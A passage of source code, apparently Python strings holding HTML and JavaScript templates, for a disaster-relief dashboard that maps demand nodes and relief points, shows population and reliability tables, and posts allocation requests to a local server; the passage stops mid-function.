<div class="top_banner">
<a href="/" style="color: black; text-decoration: none;"><h1>Dashboard</h1></a>
</div>
<div>
<input id="dmnd" class="controls" type="number" placeholder="Demand node number" />
<input id="reli" class="controls" type="number" placeholder="Relief point number" />
<input id="number" class="controls" type="number" placeholder="Enter number of people" />
<button id="submit" type="submit" class="controls">Submit</button>
<script type="text/javascript">
var myHeaders = new Headers();
myHeaders.append('pragma', 'no-cache');
myHeaders.append('cache-control', 'no-cache');
var myInit = {
method: 'GET',
headers: myHeaders,
};
fetch("../Data/display_data", myInit)
.then(function (response) {
return response.json();
}).then(function (apiJsonData) {
renderDataInTheTable(apiJsonData);
})
function renderDataInTheTable(display_data) {
const mytable = document.getElementById("main-data-table");
for(var k in display_data) {
let newRow = document.createElement("tr");
for(var x in display_data[k]){
let cell = document.createElement("td");
cell.innerText = display_data[k][x];
newRow.appendChild(cell);
}
mytable.appendChild(newRow);
}
}
document.getElementById("submit").onclick = function () {
var requestOptions = {
method: 'POST',
redirect: 'follow'
};
fetch(baseUrl+"tableUpdate/?number="+document.getElementById("number").value+"&dmnd="+document.getElementById("dmnd").value+"&reli="+document.getElementById("reli").value, requestOptions)
.then(response => response.json())
.then(result => {
console.log(result),
alert("Your request to add "+document.getElementById('number').value+" people in relief point "+document.getElementById('reli').value+" from demand node "+document.getElementById('dmnd').value+" has been sucessfully processed.\\nServer response: "+ result["msg"]);
})
.catch(error => console.log('error', error));
};
</script>
</div>
<div class="flex-container">
<div class="flex-child">
<table id = "main-data-table">
<tr>
<th>Reliability Value</th>
<th>Population Served</th>
<th>Population Unserved</th>
<th>Demand Nodes</th>
<th>Relief Points</th>
</tr>
</table>
<p>
Note: Negative values in column 'Population Unserved' shows that there is space to accomodate that much number of people
</p>
</div>
<div class="second_child">
<div id="map">
</div>
<script
src="https://maps.googleapis.com/maps/api/js?key=KEY" type="text/javascript">
</script>
<div class = "second_col_legend"><table>
<tr>
<td><canvas id="myCanvas">
</canvas></td>
<td><canvas id="myCanvas2">
</canvas></td>
</tr>
<tr>
<td style="text-align:center; vertical-align:top;"><h4>Relief Point</h4></td>
<td style="text-align:center; vertical-align:top;"><h4>Demand Point</h4></td>
</tr>
</table>
<script>
//ctx.arc(x,y,radius,startAngle,endAngle, anticlockwise);
var c = document.getElementById("myCanvas");
var ctx = c.getContext("2d");
ctx.canvas.width = "100"
ctx.canvas.height = "50"
ctx.beginPath()
ctx.arc(c.width/2, c.height/2, c.width/4, 0, Math.PI*2, false); // outer (filled)
ctx.arc(c.width/2, c.height/2, c.width/5, 0, Math.PI*2, true); // inner (unfills it)
ctx.fill();
ctx.font = "20px Arial";
ctx.fillText("N", c.width/2.35, c.height/1.55);
var c2 = document.getElementById("myCanvas2");
var ctx2 = c2.getContext("2d");
ctx2.canvas.width = "100"
ctx2.canvas.height = "50"
ctx2.beginPath()
ctx2.arc(c2.width/2, c2.height/2, c2.width/4, 0, Math.PI*2, false); // inner (unfills it)
ctx2.fill();
ctx2.font = "20px Arial";
ctx2.fillStyle = "white";
ctx2.fillText("N", c2.width/2.35, c2.height/1.55);
</script>
</div>
</div>
</div>
<script>
var baseUrl = window.location.protocol+"//"+window.location.hostname+":"+window.location.port+"/"
const myloc = {
lat: 27.302524795918504,
lng: 88.59751338243387
};
var Locations = [
['1', 'Demand', 27.302524795918504, 88.59751338243387, 'setdemand/?dmnd=1'],
['2', 'Demand', 27.309941653731695, 88.59884377512124, 'setdemand/?dmnd=2'],
['3', 'Demand', 27.30582333235349, 88.58828660114838, 'setdemand/?dmnd=3'],
['4', 'Demand', 27.310361103820796, 88.60686894416531, 'setdemand/?dmnd=4'],
['5', 'Demand', 27.293448382503307, 88.5876643286917, 'setdemand/?dmnd=5'],
['6', 'Demand', 27.30007442244496, 88.60322313404959, 'setdemand/?dmnd=6'],
['7', 'Demand', 27.290731480800943, 88.59953239709199, 'setdemand/?dmnd=7'],
['8', 'Demand',27.29443927704333, 88.60976569341749, 'setdemand/?dmnd=8'],
['1', 'Relief', 27.29908312298845, 88.59850259606205, 'setrelief/?reli=1'],
['2', 'Relief', 27.316052526734996, 88.60438310868761, 'setrelief/?reli=2'],
['3', 'Relief', 27.31059938203764, 88.58867470419628, 'setrelief/?reli=3'],
['4', 'Relief', 27.308425729881044, 88.60326660562897, 'setrelief/?reli=4'],
['5', 'Relief', 27.296108563399272, 88.59755852842592, 'setrelief/?reli=5'],
['6', 'Relief', 27.29565087437993, 88.60086281523137, 'setrelief/?reli=6'],
['7', 'Relief', 27.291570492233568, 88.59506962480899, 'setrelief/?reli=7'],
['8', 'Relief', 27.288786566493226, 88.59927488945574, 'setrelief/?reli=8'],
];
const map = new google.maps.Map(document.getElementById('map'), {
zoom: 14,
center: myloc,
});
var infowindow = new google.maps.InfoWindow();
var marker, i;
var DemandIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#ffffff',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
var ReliefIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#000000',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
for (i = 0; i < Locations.length; i++) {
if (Locations[i][1] == "Demand"){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: ReliefIcon,
url: baseUrl.concat(Locations[i][4]),
label: {color: '#ffffff', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
}
else if (Locations[i][1] == "Relief"){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: DemandIcon,
url: baseUrl.concat(Locations[i][4]),
label: {color: '#000000', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
}
google.maps.event.addListener(marker, 'click', function() {
window.location.href = this.url;
window.open(marker.url, '_blank');
});
}
</script>
</body>
</html>
"""
demand_html_content = """
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Find My Route</title>
<link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
<!--meta http-equiv="refresh" content="5"-->
</head>
<style>
html {
height: 100%
}
.main {
padding: 10px;
font-size: 20px;
/* Increased text to enable scrolling */
padding: 0px 10px;
min-height: 100%;
}
body {
height: 97%;
min-height: 97%;
font-family: 'Roboto', sans-serif;
background: #d9eeff;
overflow: hidden;
}
.controls {
width: 20%;
padding: 12px 20px;
margin: 8px 0;
box-sizing: border-box;
border-radius: 25px;
}
.controls:focus {
border: 4px solid #555;
}
#submit{
background-color: skyblue;
}
.top_banner {
text-align: center;
}
#main-data-table{
margin-left: auto;
margin-right: auto;
}
.flex-container {
min-height: 80%;
display: flex;
border-radius: 25px;
text-align: center;
justify-content: center;
}
.flex-child {
flex: 1;
align-self: center;
border-radius: 25px;
margin-right: 10px;
}
.flex-container-second {
min-height: 80%;
display: flex;
border-radius: 25px;
text-align: center;
justify-content: center;
flex-direction: column;
}
.flex-first-child-main {
flex: 1;
align-self: center;
border-radius: 25px;
margin-right: 10px;
overflow: auto;
height: 200px;
}
.flex-first-child-main thead th { position: sticky; top: 0; z-index: 1; }
.flex-first-child-second {
flex: auto;
align-self: center;
border-radius: 25px;
margin-right: 10px;
overflow: auto;
height: 200px;
}
.flex-first-child-second thead th { position: sticky; top: 0; z-index: 1; }
table { border-collapse: collapse; width: 100%; }
th, td { padding: 2px 30px; }
th { background:#eee; }
.second_child{
border-radius: 25px;
width: 200px;
flex: auto;
height: 500px;
}
#map {
align-self: center;
border-radius: 25px;
height: 500px;
width: 100%;
flex: auto;
flex-basis: 0;
flex-grow: 4;
}
.second_col_table{
align-self: center;
border-radius: 25px;
margin-right: 20px;
}
.second_col_legend{
align-self: center;
border-radius: 25px;
width: 100%;
margin-right: 20px;
}
</style>
<body>
<div class="top_banner">
<a href="/" style="color: black; text-decoration: none;"><h1>Dashboard</h1></a>
</div>
<div>
<input id="dmnd" class="controls" type="number" placeholder="Demand node number" />
<input id="reli" class="controls" type="number" placeholder="Relief point number" />
<input id="number" class="controls" type="number" placeholder="Enter number of people" />
<button id="submit" type="submit" class="controls">Submit</button>
</div>
<div class="flex-container">
<div class="flex-child">
<div class="flex-container-second">
<div class="flex-first-child-main">
<h3>Main table</h3>
<table id = "main-data-table">
<thead>
<tr>
<th>Reliability<br>Value</th>
<th>Population<br>Served</th>
<th>Population<br>Unserved</th>
<th>Demand<br>Nodes</th>
<th>Relief<br>Points</th>
</tr>
</thead>
</table>
<br>
</div>
<div class="flex-first-child-second">
<h3>Extra table</h3>
<table id = "second-data-table">
<thead>
<tr>
<th>Reliability<br>Value</th>
<th>Population<br>Served</th>
<th>Population<br>Unserved</th>
<th>Demand<br>Nodes</th>
<th>Relief<br>Points</th>
</tr>
</thead>
</table>
</div>
<p>
Note: Negative values in column 'Population Unserved' shows that there is space to accomodate that much number of people
</p>
</div>
</div>
<div class="second_child">
<div id="map">
</div>
<script
src="https://maps.googleapis.com/maps/api/js?key=KEY" type="text/javascript">
</script>
<div class = "second_col_legend"><table>
<tr>
<td><canvas id="myCanvas">
</canvas></td>
<td><canvas id="myCanvas2">
</canvas></td>
</tr>
<tr>
<td style="text-align:center; vertical-align:top;"><h4>Relief Point</h4></td>
<td style="text-align:center; vertical-align:top;"><h4>Demand Point</h4></td>
</tr>
</table>
<script>
//ctx.arc(x,y,radius,startAngle,endAngle, anticlockwise);
var c = document.getElementById("myCanvas");
var ctx = c.getContext("2d");
ctx.canvas.width = "100"
ctx.canvas.height = "50"
ctx.beginPath()
ctx.arc(c.width/2, c.height/2, c.width/4, 0, Math.PI*2, false); // outer (filled)
ctx.arc(c.width/2, c.height/2, c.width/5, 0, Math.PI*2, true); // inner (unfills it)
ctx.fill();
ctx.font = "20px Arial";
ctx.fillText("N", c.width/2.35, c.height/1.55);
var c2 = document.getElementById("myCanvas2");
var ctx2 = c2.getContext("2d");
ctx2.canvas.width = "100"
ctx2.canvas.height = "50"
ctx2.beginPath()
ctx2.arc(c2.width/2, c2.height/2, c2.width/4, 0, Math.PI*2, false); // inner (unfills it)
ctx2.fill();
ctx2.font = "20px Arial";
ctx2.fillStyle = "white";
ctx2.fillText("N", c2.width/2.35, c2.height/1.55);
</script>
</div>
</div>
</div>
<script type="text/javascript">
var myHeaders = new Headers();
myHeaders.append('pragma', 'no-cache');
myHeaders.append('cache-control', 'no-cache');
var myInit = {
method: 'GET',
headers: myHeaders,
};
const params = new URLSearchParams(window.location.search)
for (const param of params) {
window[param[0]] = [param[1]]
}
document.getElementById('dmnd').value = dmnd;
reli = [];
fetch("../Data/display_data", myInit)
.then(function (response) {
return response.json();
}).then(function (apiJsonData) {
renderDataInTheTable(apiJsonData);
setMarkers();
})
function renderDataInTheTable(display_data) {
const mytable = document.getElementById("main-data-table");
const mytable2 = document.getElementById("second-data-table");
let newBody = document.createElement("tbody");
let newBody2 = document.createElement("tbody");
mytable.appendChild(newBody)
mytable2.appendChild(newBody2)
for(var k in display_data) {
let newRow = document.createElement("tr");
let newRow2 = document.createElement("tr");
if (display_data[k][3] == dmnd){
for(var x in display_data[k]){
let cell2 = document.createElement("td");
cell2.innerText = display_data[k][x];
newRow2.appendChild(cell2);
}
reli = [...reli,String(display_data[k][4])]
newBody2.appendChild(newRow2);
}
for(var x in display_data[k]){
let cell = document.createElement("td");
cell.innerText = display_data[k][x];
newRow.appendChild(cell);
}
newBody.appendChild(newRow);
}
}
var baseUrl = window.location.protocol+"//"+window.location.hostname+":"+window.location.port+"/"
document.getElementById("submit").onclick = function () {
var requestOptions = {
method: 'POST',
redirect: 'follow'
};
fetch(baseUrl+"tableUpdate/?number="+document.getElementById("number").value+"&dmnd="+document.getElementById("dmnd").value+"&reli="+document.getElementById("reli").value, requestOptions)
.then(response => response.json())
.then(result => {
console.log(result),
alert("Your request to add "+document.getElementById('number').value+" people in relief point "+document.getElementById('reli').value+" from demand node "+document.getElementById('dmnd').value+" has been sucessfully processed.\\nServer response: "+ result["msg"]);
})
.catch(error => console.log('error', error));
};
const myloc = {
lat: 27.302524795918504,
lng: 88.59751338243387
};
var Locations = [
['1', 'Demand', 27.302524795918504, 88.59751338243387, '&dmnd=1'],
['2', 'Demand', 27.309941653731695, 88.59884377512124, '&dmnd=2'],
['3', 'Demand', 27.30582333235349, 88.58828660114838, '&dmnd=3'],
['4', 'Demand', 27.310361103820796, 88.60686894416531, '&dmnd=4'],
['5', 'Demand', 27.293448382503307, 88.5876643286917, '&dmnd=5'],
['6', 'Demand', 27.30007442244496, 88.60322313404959, '&dmnd=6'],
['7', 'Demand', 27.290731480800943, 88.59953239709199, '&dmnd=7'],
['8', 'Demand',27.29443927704333, 88.60976569341749, '&dmnd=8'],
['1', 'Relief', 27.29908312298845, 88.59850259606205, '&reli=1'],
['2', 'Relief', 27.316052526734996, 88.60438310868761, '&reli=2'],
['3', 'Relief', 27.31059938203764, 88.58867470419628, '&reli=3'],
['4', 'Relief', 27.308425729881044, 88.60326660562897, '&reli=4'],
['5', 'Relief', 27.296108563399272, 88.59755852842592, '&reli=5'],
['6', 'Relief', 27.29565087437993, 88.60086281523137, '&reli=6'],
['7', 'Relief', 27.291570492233568, 88.59506962480899, '&reli=7'],
['8', 'Relief', 27.288786566493226, 88.59927488945574, '&reli=8'],
];
const map = new google.maps.Map(document.getElementById('map'), {
zoom: 14,
center: myloc,
});
var infowindow = new google.maps.InfoWindow();
var marker, i;
var DemandIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#ffffff',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
var ReliefIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#000000',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
function setMarkers(){
for (i = 0; i < Locations.length; i++) {
if (Locations[i][1] == "Demand" && dmnd.includes(Locations[i][0])){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: ReliefIcon,
label: {color: '#ffffff', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
}
else if (Locations[i][1] == "Relief" && reli.includes(Locations[i][0])){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: DemandIcon,
url: baseUrl+"handler/?dmnd="+dmnd+Locations[i][4],
label: {color: '#000000', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
google.maps.event.addListener(marker, 'click', function() {
window.location.href = this.url;
window.open(marker.url, '_blank');
});
}
}
}
</script>
</body>
</html>
"""
relief_html_content = """
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Find My Route</title>
<link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
<!--meta http-equiv="refresh" content="5"-->
</head>
<style>
html {
height: 100%
}
.main {
padding: 10px;
font-size: 20px;
/* Increased text to enable scrolling */
padding: 0px 10px;
min-height: 100%;
}
body {
height: 97%;
min-height: 97%;
font-family: 'Roboto', sans-serif;
background: #d9eeff;
overflow: hidden;
}
.controls {
width: 20%;
padding: 12px 20px;
margin: 8px 0;
box-sizing: border-box;
border-radius: 25px;
}
.controls:focus {
border: 4px solid #555;
}
#submit{
background-color: skyblue;
}
.top_banner {
text-align: center;
}
#main-data-table{
margin-left: auto;
margin-right: auto;
}
.flex-container {
min-height: 80%;
display: flex;
border-radius: 25px;
text-align: center;
justify-content: center;
}
.flex-child {
flex: 1;
align-self: center;
border-radius: 25px;
margin-right: 10px;
}
.flex-container-second {
min-height: 80%;
display: flex;
border-radius: 25px;
text-align: center;
justify-content: center;
flex-direction: column;
}
.flex-first-child-main {
flex: 1;
align-self: center;
border-radius: 25px;
margin-right: 10px;
overflow: auto;
height: 200px;
}
.flex-first-child-main thead th { position: sticky; top: 0; z-index: 1; }
.flex-first-child-second {
flex: auto;
align-self: center;
border-radius: 25px;
margin-right: 10px;
overflow: auto;
height: 200px;
}
.flex-first-child-second thead th { position: sticky; top: 0; z-index: 1; }
table { border-collapse: collapse; width: 100%; }
th, td { padding: 2px 30px; }
th { background:#eee; }
.second_child{
border-radius: 25px;
width: 200px;
flex: auto;
height: 500px;
}
#map {
align-self: center;
border-radius: 25px;
height: 500px;
width: 100%;
flex: auto;
flex-basis: 0;
flex-grow: 4;
}
.second_col_table{
align-self: center;
border-radius: 25px;
margin-right: 20px;
}
.second_col_legend{
align-self: center;
border-radius: 25px;
width: 100%;
margin-right: 20px;
}
</style>
<body>
<div class="top_banner">
<a href="/" style="color: black; text-decoration: none;"><h1>Dashboard</h1></a>
</div>
<div>
<input id="dmnd" class="controls" type="number" placeholder="Demand node number" />
<input id="reli" class="controls" type="number" placeholder="Relief point number" />
<input id="number" class="controls" type="number" placeholder="Enter number of people" />
<button id="submit" type="submit" class="controls">Submit</button>
</div>
<div class="flex-container">
<div class="flex-child">
<div class="flex-container-second">
<div class="flex-first-child-main">
<h3>Main table</h3>
<table id = "main-data-table">
<thead>
<tr>
<th>Reliability<br>Value</th>
<th>Population<br>Served</th>
<th>Population<br>Unserved</th>
<th>Demand<br>Nodes</th>
<th>Relief<br>Points</th>
</tr>
</thead>
</table>
<br>
</div>
<div class="flex-first-child-second">
<h3>Extra table</h3>
<table id = "second-data-table">
<thead>
<tr>
<th>Reliability<br>Value</th>
<th>Population<br>Served</th>
<th>Population<br>Unserved</th>
<th>Demand<br>Nodes</th>
<th>Relief<br>Points</th>
</tr>
</thead>
</table>
</div>
<p>
Note: Negative values in column 'Population Unserved' shows that there is space to accomodate that much number of people
</p>
</div>
</div>
<div class="second_child">
<div id="map">
</div>
<script
src="https://maps.googleapis.com/maps/api/js?key=KEY" type="text/javascript">
</script>
<div class = "second_col_legend"><table>
<tr>
<td><canvas id="myCanvas">
</canvas></td>
<td><canvas id="myCanvas2">
</canvas></td>
</tr>
<tr>
<td style="text-align:center; vertical-align:top;"><h4>Relief Point</h4></td>
<td style="text-align:center; vertical-align:top;"><h4>Demand Point</h4></td>
</tr>
</table>
<script>
//ctx.arc(x,y,radius,startAngle,endAngle, anticlockwise);
var c = document.getElementById("myCanvas");
var ctx = c.getContext("2d");
ctx.canvas.width = "100"
ctx.canvas.height = "50"
ctx.beginPath()
ctx.arc(c.width/2, c.height/2, c.width/4, 0, Math.PI*2, false); // outer (filled)
ctx.arc(c.width/2, c.height/2, c.width/5, 0, Math.PI*2, true); // inner (unfills it)
ctx.fill();
ctx.font = "20px Arial";
ctx.fillText("N", c.width/2.35, c.height/1.55);
var c2 = document.getElementById("myCanvas2");
var ctx2 = c2.getContext("2d");
ctx2.canvas.width = "100"
ctx2.canvas.height = "50"
ctx2.beginPath()
ctx2.arc(c2.width/2, c2.height/2, c2.width/4, 0, Math.PI*2, false); // inner (unfills it)
ctx2.fill();
ctx2.font = "20px Arial";
ctx2.fillStyle = "white";
ctx2.fillText("N", c2.width/2.35, c2.height/1.55);
</script>
</div>
</div>
</div>
<script type="text/javascript">
var myHeaders = new Headers();
myHeaders.append('pragma', 'no-cache');
myHeaders.append('cache-control', 'no-cache');
var myInit = {
method: 'GET',
headers: myHeaders,
};
const params = new URLSearchParams(window.location.search)
for (const param of params) {
window[param[0]] = [param[1]]
}
document.getElementById('reli').value = reli;
var baseUrl = window.location.protocol+"//"+window.location.hostname+":"+window.location.port+"/"
dmnd = [];
fetch("../Data/display_data", myInit)
.then(function (response) {
return response.json();
}).then(function (apiJsonData) {
renderDataInTheTable(apiJsonData);
setMarkers();
})
function renderDataInTheTable(display_data) {
const mytable = document.getElementById("main-data-table");
const mytable2 = document.getElementById("second-data-table");
let newBody = document.createElement("tbody");
let newBody2 = document.createElement("tbody");
mytable.appendChild(newBody)
mytable2.appendChild(newBody2)
for(var k in display_data) {
let newRow = document.createElement("tr");
let newRow2 = document.createElement("tr");
if (display_data[k][4] == reli){
for(var x in display_data[k]){
let cell2 = document.createElement("td");
cell2.innerText = display_data[k][x];
newRow2.appendChild(cell2);
}
dmnd = [...dmnd,String(display_data[k][3])]
newBody2.appendChild(newRow2);
}
for(var x in display_data[k]){
let cell = document.createElement("td");
cell.innerText = display_data[k][x];
newRow.appendChild(cell);
}
newBody.appendChild(newRow);
}
}
document.getElementById("submit").onclick = function () {
var requestOptions = {
method: 'POST',
redirect: 'follow'
};
fetch(baseUrl+"tableUpdate/?number="+document.getElementById("number").value+"&dmnd="+document.getElementById("dmnd").value+"&reli="+document.getElementById("reli").value, requestOptions)
.then(response => response.json())
.then(result => {
console.log(result),
alert("Your request to add "+document.getElementById('number').value+" people in relief point "+document.getElementById('reli').value+" from demand node "+document.getElementById('dmnd').value+" has been sucessfully processed.\\nServer response: "+ result["msg"]);
})
.catch(error => console.log('error', error));
};
const myloc = {
lat: 27.302524795918504,
lng: 88.59751338243387
};
var Locations = [
['1', 'Demand', 27.302524795918504, 88.59751338243387, '&dmnd=1'],
['2', 'Demand', 27.309941653731695, 88.59884377512124, '&dmnd=2'],
['3', 'Demand', 27.30582333235349, 88.58828660114838, '&dmnd=3'],
['4', 'Demand', 27.310361103820796, 88.60686894416531, '&dmnd=4'],
['5', 'Demand', 27.293448382503307, 88.5876643286917, '&dmnd=5'],
['6', 'Demand', 27.30007442244496, 88.60322313404959, '&dmnd=6'],
['7', 'Demand', 27.290731480800943, 88.59953239709199, '&dmnd=7'],
['8', 'Demand',27.29443927704333, 88.60976569341749, '&dmnd=8'],
['1', 'Relief', 27.29908312298845, 88.59850259606205, '&reli=1'],
['2', 'Relief', 27.316052526734996, 88.60438310868761, '&reli=2'],
['3', 'Relief', 27.31059938203764, 88.58867470419628, '&reli=3'],
['4', 'Relief', 27.308425729881044, 88.60326660562897, '&reli=4'],
['5', 'Relief', 27.296108563399272, 88.59755852842592, '&reli=5'],
['6', 'Relief', 27.29565087437993, 88.60086281523137, '&reli=6'],
['7', 'Relief', 27.291570492233568, 88.59506962480899, '&reli=7'],
['8', 'Relief', 27.288786566493226, 88.59927488945574, '&reli=8'],
];
const map = new google.maps.Map(document.getElementById('map'), {
zoom: 14,
center: myloc,
});
var infowindow = new google.maps.InfoWindow();
var marker, i;
var DemandIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#ffffff',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
var ReliefIcon = {
path: google.maps.SymbolPath.CIRCLE,
fillOpacity: 1,
fillColor: '#000000',
strokeOpacity: 1,
strokeWeight: 1,
strokeColor: '#333',
scale: 12
};
function setMarkers(){
for (i = 0; i < Locations.length; i++) {
if (Locations[i][1] == "Demand" && dmnd.includes(Locations[i][0])){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: ReliefIcon,
url:baseUrl+"handler/?reli="+reli+Locations[i][4],
label: {color: '#ffffff', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
google.maps.event.addListener(marker, 'click', function() {
window.location.href = this.url;
window.open(marker.url, '_blank');
});
}
else if (Locations[i][1] == "Relief" && reli.includes(Locations[i][0])){
marker = new google.maps.Marker({
position: new google.maps.LatLng(Locations[i][2], Locations[i][3]),
map: map,
icon: DemandIcon,
label: {color: '#000000', fontSize: '12px', fontWeight: '600',
text: Locations[i][0]}
});
}
}
}
</script>
</body>
</html>
"""
handler_html_content = """
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Find My Route</title>
<link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
<!--meta http-equiv="refresh" content="5"-->
</head>
<style>
html {
height: 100%
}
.main {
padding: 10px;
font-size: 20px;
/* Increased text to enable scrolling */
padding: 0px 10px;
min-height: 100%;
}
body {
height: 97%;
min-height: 97%;
font-family: 'Roboto', sans-serif;
background: #d9eeff;
overflow: hidden;
}
.controls {
width: 20%;
padding: 12px 20px;
margin: 8px 0;
box-sizing: border-box;
border-radius: 25px;
}
.controls:focus {
border: 4px solid #555;
}
#submit{
background-color: skyblue;
}
.top_banner {
text-align: center;
}
#main-data-table{
margin-left: auto;
margin-right: auto;
}
.flex-container {
min-height: 80%;
display: flex;
border-radius: 25px;
text-align: center;
justify-content: center;
}
.flex-child {
flex: 1;
align-self: center;
border-radius: 25px;
margin-right: 10px;
}
.flex-container-second {
min-height: 80%;
display: flex;
border-radius: 25px;
text-align: center;
justify-content: center;
flex-direction: column;
}
.flex-first-child-main {
flex: 1;
align-self: center;
border-radius: 25px;
margin-right: 10px;
overflow: auto;
height: 200px;
}
.flex-first-child-main thead th { position: sticky; top: 0; z-index: 1; }
.flex-first-child-second {
flex: auto;
align-self: center;
border-radius: 25px;
margin-right: 10px;
overflow: auto;
height: 200px;
}
.flex-first-child-second thead th { position: sticky; top: 0; z-index: 1; }
table { border-collapse: collapse; width: 100%; }
th, td { padding: 2px 30px; }
th { background:#eee; }
.second_child{
border-radius: 25px;
width: 200px;
flex: auto;
height: 500px;
}
#map {
align-self: centre;
border-radius: 25px;
height: 500px;
width: 100%;
flex: auto;
flex-basis: 0;
flex-grow: 4;
}
#container {
height: 100%;
display: flex;
}
#sidebar {
flex-basis: 15rem;
flex-grow: 1;
padding: 1rem;
max-width: 30rem;
height: 100%;
box-sizing: border-box;
overflow: auto;
}
.second_col_table{
align-self: center;
border-radius: 25px;
margin-right: 20px;
}
.second_col_legend{
align-self: center;
border-radius: 25px;
width: 100%;
margin-right: 20px;
}
</style>
<body>
<div class="top_banner">
<a href="/" style="color: black; text-decoration: none;"><h1>Dashboard</h1></a>
</div>
<div>
<input id="dmnd" class="controls" type="number" placeholder="Demand node number" />
<input id="reli" class="controls" type="number" placeholder="Relief point number" />
<input id="number" class="controls" type="number" placeholder="Enter number of people" />
<button id="submit" type="submit" class="controls" onclick="submitFunction()">Submit</button>
</div>
<div class="flex-container">
<div class="flex-child">
<div class="flex-container-second">
<div class="flex-first-child-main">
<h3>Main table</h3>
<table id = "main-data-table">
<thead>
<tr>
<th>Reliability<br>Value</th>
<th>Population<br>Served</th>
<th>Population<br>Unserved</th>
<th>Demand<br>Nodes</th>
<th>Relief<br>Points</th>
</tr>
</thead>
</table>
<br>
</div>
<div class="flex-first-child-second">
<h3>Extra table</h3>
<table id = "second-data-table">
<thead>
<tr>
<th>Reliability<br>Value</th>
<th>Population<br>Served</th>
<th>Population<br>Unserved</th>
<th>Demand<br>Nodes</th>
<th>Relief<br>Points</th>
</tr>
</thead>
</table>
</div>
<p>
Note: Negative values in column 'Population Unserved' shows that there is space to accomodate that much number of people
</p>
</div>
</div>
<div class="second_child">
<div id="container">
<div id="map">
</div>
<div id="sidebar">
</div>
<script
src="https://maps.googleapis.com/maps/api/js?key=KEY&callback=initDirMap&v=weekly" type="text/javascript">
</script>
</div>
<div class = "second_col_legend"><table>
<tr>
<td><canvas id="myCanvas">
</canvas></td>
<td><canvas id="myCanvas2">
</canvas></td>
<td><canvas id="myCanvas3">
</canvas></td>
</tr>
<tr>
<td style="text-align:center; vertical-align:top;"><h4>Relief Point</h4></td>
<td style="text-align:center; vertical-align:top;"><h4>Demand Point</h4></td>
<td style="text-align:center; vertical-align:top;"><h4>Reliability Gradient<br>Red:low Green:high</h4></td>
</tr>
</table>
<script>
//ctx.arc(x,y,radius,startAngle,endAngle, anticlockwise);
var c = document.getElementById("myCanvas");
var ctx = c.getContext("2d");
ctx.canvas.width = "100"
ctx.canvas.height = "50"
ctx.beginPath()
ctx.arc(c.width/2, c.height/2, c.width/4, 0, Math.PI*2, false); // outer (filled)
ctx.arc(c.width/2, c.height/2, c.width/5, 0, Math.PI*2, true); // inner (unfills it)
ctx.fill();
ctx.font = "20px Arial";
ctx.fillText("N", c.width/2.35, c.height/1.55);
var c2 = document.getElementById("myCanvas2");
var ctx2 = c2.getContext("2d");
ctx2.canvas.width = "100"
ctx2.canvas.height = "50"
ctx2.beginPath()
ctx2.arc(c2.width/2, c2.height/2, c2.width/4, 0, Math.PI*2, false); // inner (unfills it)
ctx2.fill();
ctx2.font = "20px Arial";
ctx2.fillStyle = "white";
ctx2.fillText("N", c2.width/2.35, c2.height/1.55);
var c3 = document.getElementById("myCanvas3");
var ctx3 = c3.getContext("2d");
ctx3.canvas.width = "100"
ctx3.canvas.height = "50"
var grd = ctx3.createLinearGradient(0,0,c.width,0);
grd.addColorStop(0,"red");
grd.addColorStop(0.5,"yellow");
grd.addColorStop(1,"green");
// Fill with gradient
ctx3.fillStyle = grd;
ctx3.fillRect(c.width/10,c.width/10,c.width/1.2,c.width/3);</script>
</script>
</div>
</div>
</div>
<script type="text/javascript">
var myHeaders = new Headers();
myHeaders.append('pragma', 'no-cache');
myHeaders.append('cache-control', 'no-cache');
var myInit = {
method: 'GET',
headers: myHeaders,
};
const params = new URLSearchParams(window.location.search)
for (const param of params) {
window[param[0]] = [param[1]]
}
document.getElementById('dmnd').value = dmnd;
document.getElementById('reli').value = reli;
var baseUrl = window.location.protocol+"//"+window.location.hostname+":"+window.location.port+"/"
fetch("../Data/display_data", myInit)
.then(function (response) {
return response.json();
}).then(function (apiJsonData) {
renderDataInTheTable(apiJsonData);
setMarkers();
initDirMap();
})
var reliability;
function renderDataInTheTable(display_data) {
const mytable = document.getElementById("main-data-table");
const mytable2 = document.getElementById("second-data-table");
let newBody = document.createElement("tbody");
let newBody2 = document.createElement("tbody");
mytable.appendChild(newBody)
mytable2.appendChild(newBody2)
for(var k in display_data) {
let newRow = document.createElement("tr");
let newRow2 = document.createElement("tr");
if (display_data[k][4] == reli && display_data[k][3] == dmnd){
reliability = display_data[k][0]
for(var x in display_data[k]){
let cell2 = document.createElement("td");
cell2.innerText = display_data[k][x];
